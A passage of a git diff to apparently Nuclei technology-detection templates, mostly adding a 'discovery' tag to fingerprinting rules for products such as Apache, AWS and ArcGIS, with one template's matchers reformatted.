100644 --- a/http/technologies/admiralcloud-detect.yaml +++ b/http/technologies/admiralcloud-detect.yaml @@ -1,5 +1,5 @@ -id: admiralcloud-detect - +id: admiralcloud-detect + info: name: AdmiralCloud - Detect author: righettod @@ -12,26 +12,26 @@ info: verified: true max-request: 1 shodan-query: http.title:"AdmiralCloud" - tags: tech,admiralcloud,detect + tags: tech,admiralcloud,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "content=\"admiralcloud", "admiralcloud")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "content=\"admiralcloud", "<title>admiralcloud")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '\s+([0-9\.]+)' # digest: 490a0046304402207ae2deb203fc16b2ae9ddcc42a21330464743e6e80b24ed18f502a9887c3379102203f6113909221f7bfca0eca9072f0e5652e330b8132488ae1b8c6fd319b7aa5ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml index bf4aa3fb044..89e7213fa5e 100644 --- a/http/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml @@ -13,7 +13,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion,tech + tags: adobe,coldfusion,tech,discovery http: - method: GET diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml index 6e9e56da9ca..c4f93ea2c88 100644 --- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion,tech + tags: adobe,coldfusion,tech,discovery http: - method: GET diff --git a/http/technologies/aem-cms.yaml b/http/technologies/aem-cms.yaml index 82babfb80b1..77e4c83f5de 100644 --- a/http/technologies/aem-cms.yaml +++ b/http/technologies/aem-cms.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: aem,tech + tags: aem,tech,discovery http: - method: GET diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml index 76fa168bda9..f530872e7e2 100644 --- a/http/technologies/aem-detect.yaml +++ b/http/technologies/aem-detect.yaml @@ -17,7 +17,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,favicon,tech,adobe + tags: aem,favicon,tech,adobe,discovery http: - method: GET diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml index 264b9148cf3..e30ae188058 100644 --- a/http/technologies/aerocms-detect.yaml +++ b/http/technologies/aerocms-detect.yaml @@ -13,7 +13,7 @@ info: product: aerocms shodan-query: title:"AeroCMS" fofa-query: "AeroCMS" - tags: tech,aerocms + tags: tech,aerocms,discovery http: - method: GET diff --git a/http/technologies/airtame-device-detect.yaml b/http/technologies/airtame-device-detect.yaml index fecc14a554a..f53eacb3c78 100644 --- a/http/technologies/airtame-device-detect.yaml +++ b/http/technologies/airtame-device-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,airtame,iot + tags: tech,airtame,iot,discovery http: - method: GET diff --git a/http/technologies/akamai-cache-detect.yaml b/http/technologies/akamai-cache-detect.yaml index d9bcca1df52..c2b7990956d 100644 --- a/http/technologies/akamai-cache-detect.yaml +++ b/http/technologies/akamai-cache-detect.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: cache,akamai,tech + tags: cache,akamai,tech,discovery http: - method: HEAD diff --git a/http/technologies/akamai-detect.yaml b/http/technologies/akamai-detect.yaml index a4a578d03fc..29735f9770c 100644 --- a/http/technologies/akamai-detect.yaml +++ b/http/technologies/akamai-detect.yaml @@ -10,7 +10,7 @@ info: - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ metadata: max-request: 1 - tags: akamai,cdn,tech + tags: akamai,cdn,tech,discovery http: - method: GET diff --git a/http/technologies/akamai/akamai-bot-manager-detect.yaml b/http/technologies/akamai/akamai-bot-manager-detect.yaml index 9c7774b0dd3..24654874828 100644 --- a/http/technologies/akamai/akamai-bot-manager-detect.yaml +++ b/http/technologies/akamai/akamai-bot-manager-detect.yaml @@ -11,7 +11,7 @@ info: - https://techdocs.akamai.com/identity-cloud/docs/hosted-login-cookies-and-local-storage-1 metadata: max-request: 1 - tags: akamai,bot,security,detect + tags: akamai,bot,security,detect,discovery http: - method: GET diff --git a/http/technologies/amazon-ecs-defualt-page.yaml b/http/technologies/amazon-ecs-defualt-page.yaml index 2bcfa7068ae..0fb274faa78 100644 --- a/http/technologies/amazon-ecs-defualt-page.yaml +++ b/http/technologies/amazon-ecs-defualt-page.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Amazon ECS Sample App" - tags: amazon,tech,default,detect + tags: amazon,tech,default,detect,discovery http: - method: GET diff --git a/http/technologies/ambassador-edge-stack-detect.yaml b/http/technologies/ambassador-edge-stack-detect.yaml index 425dbb69c3a..84f1f76a3e2 100644 --- a/http/technologies/ambassador-edge-stack-detect.yaml +++ b/http/technologies/ambassador-edge-stack-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Ambassador Edge Stack" - tags: tech,ambassador,gateway + tags: tech,ambassador,gateway,discovery http: - method: GET diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml index 3ff82cfe2fe..477528f7aa7 100644 --- a/http/technologies/angular-detect.yaml +++ b/http/technologies/angular-detect.yaml @@ -15,7 +15,7 @@ info: vendor: angular product: angular shodan-query: html:"ng-version=" - tags: tech,angular + tags: tech,angular,discovery http: - method: GET diff --git a/http/technologies/ansible-awx-detect.yaml b/http/technologies/ansible-awx-detect.yaml index 6b8e0d3e5ce..e1d95d3b42b 100644 --- a/http/technologies/ansible-awx-detect.yaml +++ b/http/technologies/ansible-awx-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:'Select a frequency for snapshot retention' - tags: tech,ansible,awx + tags: tech,ansible,awx,discovery http: - method: GET diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index 98bb4f8e0d7..002c10abaf5 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: airflow shodan-query: http.html:"Apache Airflow" - tags: tech,apache,airflow,intrusive + tags: tech,apache,airflow,intrusive,discovery http: - method: GET diff --git a/http/technologies/apache/apache-activemq-artemis-detect.yaml b/http/technologies/apache/apache-activemq-artemis-detect.yaml index 15937347003..1444ac4ecbe 100644 --- a/http/technologies/apache/apache-activemq-artemis-detect.yaml +++ b/http/technologies/apache/apache-activemq-artemis-detect.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: activemq shodan-query: title:"ActiveMQ Artemis Console" - tags: tech,activemq,artemis,apache,detect + tags: tech,activemq,artemis,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-allura-detect.yaml b/http/technologies/apache/apache-allura-detect.yaml index 152e981e663..142c9a6a03c 100644 --- a/http/technologies/apache/apache-allura-detect.yaml +++ b/http/technologies/apache/apache-allura-detect.yaml @@ -16,7 +16,7 @@ info: product: allura verified: true fofa-query: body="Apache Allura" - tags: tech,allura,apache,detect + tags: tech,allura,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index e3eea3b9b4c..b66c818d420 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -17,7 +17,7 @@ info: product: answer shodan-query: http.favicon.hash:523757057 fofa-query: icon_hash="523757057" - tags: detect,tech,apache + tags: detect,tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml index e0639de4be7..6eaed1c8a86 100644 --- a/http/technologies/apache/apache-axis-detect.yaml +++ b/http/technologies/apache/apache-axis-detect.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: axis shodan-query: http.html:"Apache Axis" - tags: tech,axis2,middleware,apache + tags: tech,axis2,middleware,apache,discovery http: - method: GET diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml index 787f3f47a02..789a451279f 100644 --- a/http/technologies/apache/apache-cloudstack-detect.yaml +++ b/http/technologies/apache/apache-cloudstack-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: cloudstack shodan-query: http.title:"Apache CloudStack" - tags: tech,apache,cloudstack + tags: tech,apache,cloudstack,discovery http: - method: GET diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml index 1cca0d34882..f03a220b788 100644 --- a/http/technologies/apache/apache-cocoon-detect.yaml +++ b/http/technologies/apache/apache-cocoon-detect.yaml @@ -13,7 +13,7 @@ info: product: cocoon shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech + tags: apache,cocoon,tech,discovery http: - method: GET diff --git a/http/technologies/apache/apache-detect.yaml b/http/technologies/apache/apache-detect.yaml index 3dcf692ee02..a82e66dfdb9 100644 --- a/http/technologies/apache/apache-detect.yaml +++ b/http/technologies/apache/apache-detect.yaml @@ -7,7 +7,7 @@ info: description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained metadata: max-request: 1 - tags: tech,apache + tags: tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/apache-dubbo-detect.yaml b/http/technologies/apache/apache-dubbo-detect.yaml index fb01da8da77..e26e581f442 100644 --- a/http/technologies/apache/apache-dubbo-detect.yaml +++ b/http/technologies/apache/apache-dubbo-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: dubbo fofa-query: app="APACHE-dubbo" - tags: apache,dubbo,tech + tags: apache,dubbo,tech,discovery http: - method: GET diff --git a/http/technologies/apache/apache-gravitino-detect.yaml b/http/technologies/apache/apache-gravitino-detect.yaml index ceff0179725..af53fdba731 100644 --- a/http/technologies/apache/apache-gravitino-detect.yaml +++ b/http/technologies/apache/apache-gravitino-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: gravitino shodan-query: title:"Gravitino" - tags: tech,gravitino,apache,detect + tags: tech,gravitino,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-guacamole.yaml b/http/technologies/apache/apache-guacamole.yaml index cc6d6d0670f..bed98c24d13 100644 --- a/http/technologies/apache/apache-guacamole.yaml +++ b/http/technologies/apache/apache-guacamole.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: apache,guacamole,tech,login + tags: apache,guacamole,tech,login,discovery http: - method: GET diff --git a/http/technologies/apache/apache-hertzbeat-detect.yaml b/http/technologies/apache/apache-hertzbeat-detect.yaml index 6265269d035..731788e2bf7 100644 --- a/http/technologies/apache/apache-hertzbeat-detect.yaml +++ b/http/technologies/apache/apache-hertzbeat-detect.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: hertzbeat shodan-query: title:"HertzBeat" - tags: tech,hertzbeat,apache,detect + tags: tech,hertzbeat,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-inlong-detect.yaml b/http/technologies/apache/apache-inlong-detect.yaml index d65dcc2dbe9..68f50ac7ca4 100644 --- a/http/technologies/apache/apache-inlong-detect.yaml +++ b/http/technologies/apache/apache-inlong-detect.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: inlong fofa-query: icon_hash="1155196680" - tags: tech,apache,inlong,detect + tags: tech,apache,inlong,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-jspwiki-detect.yaml b/http/technologies/apache/apache-jspwiki-detect.yaml index ea5b92837b0..84dbc4e6583 100644 --- a/http/technologies/apache/apache-jspwiki-detect.yaml +++ b/http/technologies/apache/apache-jspwiki-detect.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: jspwiki shodan-query: title:"JSPWiki" - tags: tech,jspwiki,apache,detect + tags: tech,jspwiki,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml index e0eb3c0c53b..7e8ef16d615 100644 --- a/http/technologies/apache/apache-karaf-panel.yaml +++ b/http/technologies/apache/apache-karaf-panel.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: karaf shodan-query: realm="karaf" - tags: tech,apache,karaf + tags: tech,apache,karaf,discovery http: - method: GET diff --git a/http/technologies/apache/apache-kyuubi-detect.yaml b/http/technologies/apache/apache-kyuubi-detect.yaml index 2084faf346e..8ae667003d3 100644 --- a/http/technologies/apache/apache-kyuubi-detect.yaml +++ b/http/technologies/apache/apache-kyuubi-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: apache product: kyuubi - tags: tech,kyuubi,apache,detect + tags: tech,kyuubi,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-ofbiz-detect.yaml b/http/technologies/apache/apache-ofbiz-detect.yaml index 777e29aa471..5e62296d2b1 100644 --- a/http/technologies/apache/apache-ofbiz-detect.yaml +++ b/http/technologies/apache/apache-ofbiz-detect.yaml @@ -14,7 +14,7 @@ info: vendor: apache product: ofbiz fofa-query: app="Apache_OFBiz" - tags: tech,detect,ofbiz,apache + tags: tech,detect,ofbiz,apache,discovery http: - method: GET diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 06577bf46e7..b8e9f49c8fa 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: ozone shodan-query: title:"Apache Ozone" - tags: tech,ozone,apache,detect + tags: tech,ozone,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-pinot-detect.yaml b/http/technologies/apache/apache-pinot-detect.yaml index 4f043475960..15f6b527b59 100644 --- a/http/technologies/apache/apache-pinot-detect.yaml +++ b/http/technologies/apache/apache-pinot-detect.yaml @@ -14,7 +14,7 @@ info: vendor: apache product: pinot shodan-query: title:"Apache Pinot" - tags: tech,pinot,apache,detect + tags: tech,pinot,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-shenyu-detect.yaml b/http/technologies/apache/apache-shenyu-detect.yaml index f05e0c47a94..71db894b3f6 100644 --- a/http/technologies/apache/apache-shenyu-detect.yaml +++ b/http/technologies/apache/apache-shenyu-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: shenyu shodan-query: title:"shenyu" - tags: tech,shenyu,apache,detect + tags: tech,shenyu,apache,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-streampark-detect.yaml b/http/technologies/apache/apache-streampark-detect.yaml index 1b77f8b3efd..dab56da04e2 100644 --- a/http/technologies/apache/apache-streampark-detect.yaml +++ b/http/technologies/apache/apache-streampark-detect.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: streampark shodan-query: title:"Apache StreamPark" - tags: tech,apache,streampark,detect + tags: tech,apache,streampark,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-streampipes-detect.yaml b/http/technologies/apache/apache-streampipes-detect.yaml index f889caf559b..50bafda8c27 100644 --- a/http/technologies/apache/apache-streampipes-detect.yaml +++ b/http/technologies/apache/apache-streampipes-detect.yaml @@ -15,7 +15,7 @@ info: product: streampipes shodan-query: title:"apache streampipes" fofa-query: title="apache streampipes" - tags: tech,apache,streampipes,detect + tags: tech,apache,streampipes,detect,discovery http: - method: GET diff --git a/http/technologies/apache/apache-tapestry-detect.yaml b/http/technologies/apache/apache-tapestry-detect.yaml index fe71b3a471d..0318d0a7e15 100644 --- a/http/technologies/apache/apache-tapestry-detect.yaml +++ b/http/technologies/apache/apache-tapestry-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: tapestry fofa-query: app="APACHE-Tapestry" - tags: apache,tapestry,tech + tags: apache,tapestry,tech,discovery http: - method: GET diff --git a/http/technologies/apache/apache-zeppelin-detect.yaml b/http/technologies/apache/apache-zeppelin-detect.yaml index 2bbef2fe7e1..f3fa390ba5c 100644 --- a/http/technologies/apache/apache-zeppelin-detect.yaml +++ b/http/technologies/apache/apache-zeppelin-detect.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: zeppelin fofa-query: app="APACHE-Zeppelin" - tags: apache,zeppelin,tech + tags: apache,zeppelin,tech,discovery http: - method: GET diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml index 5d9876bfe2e..4fc50174170 100644 --- a/http/technologies/apache/default-apache-test-all.yaml +++ b/http/technologies/apache/default-apache-test-all.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: http_server shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - tags: tech,apache + tags: tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/default-apache-test-page.yaml b/http/technologies/apache/default-apache-test-page.yaml index bc7bacee812..9f94d15666d 100644 --- a/http/technologies/apache/default-apache-test-page.yaml +++ b/http/technologies/apache/default-apache-test-page.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: http_server shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" - tags: tech,apache + tags: tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/default-apache2-page.yaml b/http/technologies/apache/default-apache2-page.yaml index cd58a0b7495..e503a0ca540 100644 --- a/http/technologies/apache/default-apache2-page.yaml +++ b/http/technologies/apache/default-apache2-page.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: http_server shodan-query: http.title:"Apache2 Debian Default Page:" - tags: tech,apache + tags: tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/default-apache2-ubuntu-page.yaml b/http/technologies/apache/default-apache2-ubuntu-page.yaml index 91046231c4d..8b0edc44936 100644 --- a/http/technologies/apache/default-apache2-ubuntu-page.yaml +++ b/http/technologies/apache/default-apache2-ubuntu-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Apache2 Ubuntu Default Page" - tags: tech,apache + tags: tech,apache,discovery http: - method: GET diff --git a/http/technologies/apache/kafka-manager-panel.yaml b/http/technologies/apache/kafka-manager-panel.yaml index 4555341da3a..0771a334d27 100644 --- a/http/technologies/apache/kafka-manager-panel.yaml +++ b/http/technologies/apache/kafka-manager-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: title:"Kafka-Manager" fofa-query: app="Kafka-Manager" - tags: tech,kafka,apache + tags: tech,kafka,apache,discovery http: - method: GET diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml index fa35098c842..d3353bc21da 100644 --- a/http/technologies/apache/ranger-detection.yaml +++ b/http/technologies/apache/ranger-detection.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: ranger shodan-query: http.title:"Ranger - Sign In" - tags: tech,apache,ranger + tags: tech,apache,ranger,discovery http: - method: GET diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index 40a538b76a7..18d382bbbfd 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -20,7 +20,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: tech,tomcat,apache,intrusive + tags: tech,tomcat,apache,intrusive,discovery http: - method: GET diff --git a/http/technologies/apache/xampp-default-page.yaml b/http/technologies/apache/xampp-default-page.yaml index afafc3d148b..c1ae38aa753 100644 --- a/http/technologies/apache/xampp-default-page.yaml +++ b/http/technologies/apache/xampp-default-page.yaml @@ -11,7 +11,7 @@ info: vendor: apachefriends product: xampp shodan-query: http.title:"XAMPP" - tags: tech,php,xampp,apache + tags: tech,php,xampp,apache,discovery http: - method: GET diff --git a/http/technologies/apollo-server-detect.yaml b/http/technologies/apollo-server-detect.yaml index 11e8fd43e1c..a6edb647508 100644 --- a/http/technologies/apollo-server-detect.yaml +++ b/http/technologies/apollo-server-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: apollo,detect,graphql,tech + tags: apollo,detect,graphql,tech,discovery http: - method: POST diff --git a/http/technologies/appcms-detect.yaml b/http/technologies/appcms-detect.yaml index eaa04df7c8e..db2df4c2766 100644 --- a/http/technologies/appcms-detect.yaml +++ b/http/technologies/appcms-detect.yaml @@ -11,7 +11,7 @@ info: vendor: appcms product: appcms shodan-query: http.html:"Powerd by AppCMS" - tags: tech,appcms + tags: tech,appcms,discovery http: - method: GET diff --git a/http/technologies/apple-httpserver.yaml b/http/technologies/apple-httpserver.yaml index 1357c68f0fa..6667a401101 100644 --- a/http/technologies/apple-httpserver.yaml +++ b/http/technologies/apple-httpserver.yaml @@ -9,7 +9,7 @@ info: max-request: 1 shodan-query: "AppleHttpServer" fofa-query: app="Apple-HttpServer" - tags: tech,apple,httpserver + tags: tech,apple,httpserver,discovery http: - method: GET diff --git a/http/technologies/aqua-enterprise-detect.yaml b/http/technologies/aqua-enterprise-detect.yaml index ee63e9eaf16..9ea198a7719 100644 --- a/http/technologies/aqua-enterprise-detect.yaml +++ b/http/technologies/aqua-enterprise-detect.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1261322577 - tags: tech,aqua + tags: tech,aqua,discovery http: - method: GET diff --git a/http/technologies/arcgis-detect.yaml b/http/technologies/arcgis-detect.yaml index 056c2699a01..8a57b47fb05 100644 --- a/http/technologies/arcgis-detect.yaml +++ b/http/technologies/arcgis-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 5 shodan-query: http.title:"ArcGIS" - tags: tech,arcgis,detect + tags: tech,arcgis,detect,discovery http: - method: GET diff --git a/http/technologies/arcgis-rest-api.yaml b/http/technologies/arcgis-rest-api.yaml index bed7e473ae2..543bcd9e2b8 100644 --- a/http/technologies/arcgis-rest-api.yaml +++ b/http/technologies/arcgis-rest-api.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: esri product: arcgis_engine - tags: api,arcgis,cms,tech,esri + tags: api,arcgis,cms,tech,esri,discovery http: - method: GET diff --git a/http/technologies/arcgis-token-service-detect.yaml b/http/technologies/arcgis-token-service-detect.yaml index 70ce8e3a4c1..386efd1fb5d 100644 --- a/http/technologies/arcgis-token-service-detect.yaml +++ b/http/technologies/arcgis-token-service-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"arcgis" fofa-query: title="arcgis" google-query: intitle:"arcgis" - tags: tech,arcgis,tokens,detect,esri + tags: tech,arcgis,tokens,detect,esri,discovery http: - method: GET diff --git a/http/technologies/artica-web-proxy-detect.yaml b/http/technologies/artica-web-proxy-detect.yaml index 22c06a6eb35..8268728cdf1 100644 --- a/http/technologies/artica-web-proxy-detect.yaml +++ b/http/technologies/artica-web-proxy-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,artica,proxy + tags: tech,artica,proxy,discovery http: - method: GET diff --git a/http/technologies/atlassian-connect-descriptor.yaml b/http/technologies/atlassian-connect-descriptor.yaml index c10c98fe0d7..f0dda4c146f 100644 --- a/http/technologies/atlassian-connect-descriptor.yaml +++ b/http/technologies/atlassian-connect-descriptor.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"atlassian-connect.json" - tags: atlassian,tech,jira + tags: atlassian,tech,jira,discovery http: - method: GET diff --git a/http/technologies/attu-detect.yaml b/http/technologies/attu-detect.yaml index 000fab103f3..3bb689a2b11 100644 --- a/http/technologies/attu-detect.yaml +++ b/http/technologies/attu-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 fofa-query: title="Attu" - tags: tech,vector-database,attu,detect + tags: tech,vector-database,attu,detect,discovery http: - method: GET diff --git a/http/technologies/autobahn-python-detect.yaml b/http/technologies/autobahn-python-detect.yaml index e2c914c4020..b337262fb98 100644 --- a/http/technologies/autobahn-python-detect.yaml +++ b/http/technologies/autobahn-python-detect.yaml @@ -11,7 +11,7 @@ info: vendor: crossbar product: autobahn shodan-query: "AutobahnPython" - tags: tech,webserver + tags: tech,webserver,discovery http: - method: GET diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml index 41f26515809..d0e4fb154c7 100644 --- a/http/technologies/avideo-detect.yaml +++ b/http/technologies/avideo-detect.yaml @@ -13,7 +13,7 @@ info: product: avideo shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: tech,avideo + tags: tech,avideo,discovery http: - method: GET diff --git a/http/technologies/aws-elastic-beanstalk-detect.yaml b/http/technologies/aws-elastic-beanstalk-detect.yaml index 01034deb71a..9ddb1f35133 100644 --- a/http/technologies/aws-elastic-beanstalk-detect.yaml +++ b/http/technologies/aws-elastic-beanstalk-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: aws,tech,beanstalk + tags: aws,tech,beanstalk,discovery http: - method: GET diff --git a/http/technologies/aws/amazon-ec2-detect.yaml b/http/technologies/aws/amazon-ec2-detect.yaml index bd3622276e0..73a11aaba00 100644 --- a/http/technologies/aws/amazon-ec2-detect.yaml +++ b/http/technologies/aws/amazon-ec2-detect.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: "Server: EC2ws" - tags: tech,aws,ec2,amazon + tags: tech,aws,ec2,amazon,discovery http: - method: GET diff --git a/http/technologies/aws/aws-bucket-service.yaml b/http/technologies/aws/aws-bucket-service.yaml index 438f5ed5562..dcc5ad87cf7 100644 --- a/http/technologies/aws/aws-bucket-service.yaml +++ b/http/technologies/aws/aws-bucket-service.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: aws,tech,bucket + tags: aws,tech,bucket,discovery http: - method: GET diff --git a/http/technologies/aws/aws-cloudfront-service.yaml b/http/technologies/aws/aws-cloudfront-service.yaml index 3968fba673c..c2586f70654 100644 --- a/http/technologies/aws/aws-cloudfront-service.yaml +++ b/http/technologies/aws/aws-cloudfront-service.yaml @@ -7,7 +7,7 @@ info: description: Detect websites using AWS cloudfront service metadata: max-request: 1 - tags: aws,tech,service + tags: aws,tech,service,discovery http: - method: GET diff --git a/http/technologies/aws/aws-detect.yaml b/http/technologies/aws/aws-detect.yaml index 06a78ab849f..fa4a784a19c 100644 --- a/http/technologies/aws/aws-detect.yaml +++ b/http/technologies/aws/aws-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,aws,amazon,alb,cloudfront,codebuild,gateway,xray,captcha,dynamodb,kms + tags: tech,aws,amazon,alb,cloudfront,codebuild,gateway,xray,captcha,dynamodb,kms,discovery http: - method: GET diff --git a/http/technologies/azure-kubernetes-service.yaml b/http/technologies/azure-kubernetes-service.yaml index 0ef0b09347f..14d7bd6a6c4 100644 --- a/http/technologies/azure-kubernetes-service.yaml +++ b/http/technologies/azure-kubernetes-service.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,azure,k8s,kubernetes + tags: tech,azure,k8s,kubernetes,discovery http: - method: GET diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml index 3a3ba25b424..ae3dd2cdc9f 100644 --- a/http/technologies/b2b-builder-detect.yaml +++ b/http/technologies/b2b-builder-detect.yaml @@ -11,7 +11,7 @@ info: vendor: itechscripts product: b2b_script fofa-query: app="B2BBuilder" - tags: b2bbuilder,tech + tags: b2bbuilder,tech,discovery http: - method: GET diff --git a/http/technologies/backdrop-cms-detect.yaml b/http/technologies/backdrop-cms-detect.yaml index 9a937917422..fcc0c29048e 100644 --- a/http/technologies/backdrop-cms-detect.yaml +++ b/http/technologies/backdrop-cms-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Backdrop CMS" - tags: tech,backdrop,cms,detect + tags: tech,backdrop,cms,detect,discovery http: - method: GET diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml index 3f17620b328..c440a99d6fd 100644 --- a/http/technologies/bamboo-detect.yaml +++ b/http/technologies/bamboo-detect.yaml @@ -15,7 +15,7 @@ info: product: bamboo shodan-query: http.favicon.hash:-1379982221 category: devops - tags: tech,bamboo,atlassian,detect,cicd + tags: tech,bamboo,atlassian,detect,cicd,discovery http: - method: GET diff --git a/http/technologies/basic-auth-detect.yaml b/http/technologies/basic-auth-detect.yaml index 6e237621547..49f5523653b 100644 --- a/http/technologies/basic-auth-detect.yaml +++ b/http/technologies/basic-auth-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: "www-authenticate:" - tags: tech,basic,auth + tags: tech,basic,auth,discovery http: - method: GET diff --git a/http/technologies/besu-server-detect.yaml b/http/technologies/besu-server-detect.yaml index 93de2cd987c..72a4830efc0 100644 --- a/http/technologies/besu-server-detect.yaml +++ b/http/technologies/besu-server-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: product:"besu" - tags: tech,besu,ethereum,web3,blockchain + tags: tech,besu,ethereum,web3,blockchain,discovery http: - raw: diff --git 